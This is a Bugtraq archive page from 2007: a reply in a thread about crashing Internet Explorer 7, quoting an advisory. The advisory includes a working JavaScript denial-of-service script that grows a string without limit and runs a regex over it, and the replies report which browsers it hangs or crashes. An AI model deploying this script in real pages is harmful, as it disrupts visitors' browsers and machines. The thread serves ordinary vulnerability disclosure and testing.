Bugtraq mailing list archives

Re: Internet Explorer Crash

From: Mike Ely <me () taupehat com>
Date: Tue, 17 Apr 2007 16:02:08 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nope.  Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it
didn't even flinch.  No OOM-killing here.

On the other hand, Konqueror 3.5.5 "release 45.4" churned swap madly for
about five minutes (the machine continued to run well enough if just a
bit slower) until Konq sig-sixed itself.

Cheers

The Anarcat wrote:

Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)

I would think that Firefox and most browsers implementing javascript
would die an horrible OOM death on this.

A.

On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
               while (z.length <= 
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
       var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 

The happiness of society is the end of government.
John Adams


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX
N1X/wJSO4U4Sx3z5Yn0S6Tk=
=T/tc
-----END PGP SIGNATURE-----

Current thread:

Internet Explorer Crash J. Oquendo (Apr 17)
- Re: Internet Explorer Crash The Anarcat (Apr 17)
  - Re: Internet Explorer Crash Mike Ely (Apr 18)
  - Re: Internet Explorer Crash simone colombo (Apr 19)
- <Possible follow-ups>
- Re: Internet Explorer Crash Thor (Hammer of God) (Apr 17)
  - Re: Internet Explorer Crash Tom Gregory (Apr 18)
    - Re: Internet Explorer Crash Rob Bartlett (Apr 18)
    - Re: Internet Explorer Crash Kevin Finisterre (lists) (Apr 19)
    - Re: Internet Explorer Crash Dave Walker (Apr 19)
    - Re: Internet Explorer Crash C. Bergström (Apr 19)
  - Message not available
    - Re: Internet Explorer Crash Thor (Hammer of God) (Apr 18)
- Re: Internet Explorer Crash elflord91 (Apr 18)